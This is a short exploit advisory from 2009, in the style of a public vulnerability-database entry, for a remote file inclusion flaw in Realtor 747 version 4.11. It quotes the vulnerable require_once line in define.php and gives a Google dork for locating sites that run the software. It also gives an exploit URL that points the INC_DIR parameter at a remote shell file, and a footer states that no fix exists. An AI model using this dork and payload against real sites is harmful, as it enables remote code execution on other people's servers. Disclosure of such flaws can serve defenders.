Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability

2009-01-12 00:03:11

-----------------:Remote File Include:-----------------
-------------------------------------------------------


script:realtor747 Version 4.11

------------------------------------------------------------------
download from:http://www.it747.com/realtor747/intro/trial/realtor747-v4-11-trial.zip

------------------------------------------------------------------

.......................................................
vul:/include/define.php line 51:

require_once( "$INC_DIR/define_area.php" );

------------------------------------------------------

dork:"REALTOR 747 - Version 4.11"
-----------------------------------------------------

xpl:

http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]
---------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.